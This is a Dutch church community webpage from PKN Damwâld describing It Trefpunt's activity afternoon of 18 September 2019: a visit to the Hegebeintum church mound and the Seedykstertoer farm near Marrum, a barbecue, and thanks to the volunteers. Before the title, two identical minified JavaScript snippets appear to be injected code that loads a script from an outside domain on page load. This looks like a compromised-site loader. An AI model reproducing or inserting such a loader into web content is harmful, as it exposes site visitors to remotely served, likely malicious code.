;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); IT Trefpunt: Activiteitenmiddag op woensdag 18 september 2019 - PKN Damwâld

IT Trefpunt: Activiteitenmiddag op woensdag 18 september 2019

Gepubliceerd op: dinsdag 24 september 2019

Onze 1e extra activiteit vond plaats in juni 2019 en was een groot succes. Omdat toen niet iedereen mee kon, zou een 2e middag volgen. Deze werd in goed overleg gepland op woensdag 18 september.

Belangrijkste reden voor deze uitjes is dat iedereen er graag eens (vaker) tussenuit wil omdat dat niet meer voor de hand ligt. Het programma deze middag bestond uit bezoek aan Hegebeintum en de Seedykstertoer bij Marrum met afsluitend een barbecue. En, waar we de vorige keer bang waren voor de hitte en het doorgaan van het uitje, was het deze keer andersom. Maar ook nu was het weer ons gunstig gezind (op 1 buitje) na en kon het allemaal prima doorgaan.

De belangstelling was deze keer nog groter en met 7 auto’s vol gingen we om 13.00 uur op weg. Bij de terp aangekomen konden we eerst allerlei informatie bekijken en lezen in het informatiecentrum over de terp en de kerk daarop. Daarna met z’n allen naar de kerk waar onze gids Sjoukje van der Veen, 1 van de vele vrijwilligers aldaar, ons vertelde van het ontstaan en de geschiedenis door de eeuwen heen van de kerk, van zowel de buitenkant met graven als de binnenkant met de vele bijzondere en prachtige borden en andere attributen.

Op weg naar de Seedykstertoer werd iedereen verrast met koffie, thee of fris met wat lekkers erbij.  Daarvoor was een interessante plek gekozen nl. de parkeerplaats bij het nieuwe gemaal De Heining bij Marrum. Dit gemaal is het resultaat van project Vijfhuizen ‘Fan swiet nei sȃlt ’ en werd geopend op 15 november 2018 en werd donderdag 14 maart 2019 voor het eerst in werking gezet omdat het water in de Friese meren, sloten en vaarten zo’n 10 centimeter te hoog stond door heel veel regenwater. Het gemaal is niet te vergelijken met het Woudagemaal in Lemmer en is met zijn 2 pompen snel bekeken maar is wel opnieuw een technisch hoogstandje.

De volgende halte was een kilometer verderop. De Seedykstertoer is een initiatief van Gerben Visbeek die een kleine 20 jaar geleden zijn boerderij en toebehoren heeft ingericht om bezoekers te ontvangen en te informeren over van alles en nog wat bijv. over de slykwurkers, oude (hand) gereedschappen het Wad enz.. De heer Visbeek is erg enthousiast en vertelde  zeer onderhoudend. Hij liet ons ook een prachtige film zien van de redding van rond de150 paarden enige jaren geleden, die buitendijks door de hoge waterstand in de problemen kwamen en werden gered door 6 vrouwen (engelen) te paard. Die beelden gingen de hele wereld over!!

Als je wilt dan kun je ook een prachtige toertocht maken, maar daar hadden wij geen tijd meer voor.

Een oude en ruim 20 meter hoge silo wordt gebruikt als uitzichttoren. De beklimming, die de nodige durf vraagt, en het uitzicht zijn de moeite waard. Ongeveer 10 deelnemers durfden de klim aan.

Tot slot werd rond 17.30 op de Halewei begonnen aan de laatste activiteit, de barbecue!!

De groep, inmiddels gegroeid tot 30, heeft genoten van vlees, salades en een toetje tot slot. Ondanks de  enorme inzet van een ieder, bleven er nog enkele stokjes met vlees over maar na enig aandringen werd dat probleem opgelost. Om 19.15 kwam een einde aan een prachtige middag.

Wij als organisatie hebben ook erg genoten en willen iedereen die mee was bedanken voor hun deelname, enthousiasme en eetlust. Dank aan de vaste vrijwilligers Sietse, Lutske  Pieter, Inge,  en Anneke maar ook aan onze “gast” vrijwilligers Joke, Drewis en Kees. Deze laatsten hebben er mede voor gezorgd dat iedereen kon worden vervoerd.  Faten, ook een vaste vrijwilliger,  was helaas verhinderd door ziekenhuisopname van haar dochter.

Nog een woord van heel veel dank, namelijk aan Mattie de Boer. Zij was vanaf het begin van It Trefpunt, nu 3 ½ jaar geleden, vrijwilliger en deed haar werk trouw en met veel plezier en inzet.  Zij moet nu helaas afhaken vanwege andere roosterdiensten en daardoor voortaan altijd werken op donderdagmorgen. Ze komt terug als vrijwilliger zodra dat kan! Dankjewel!!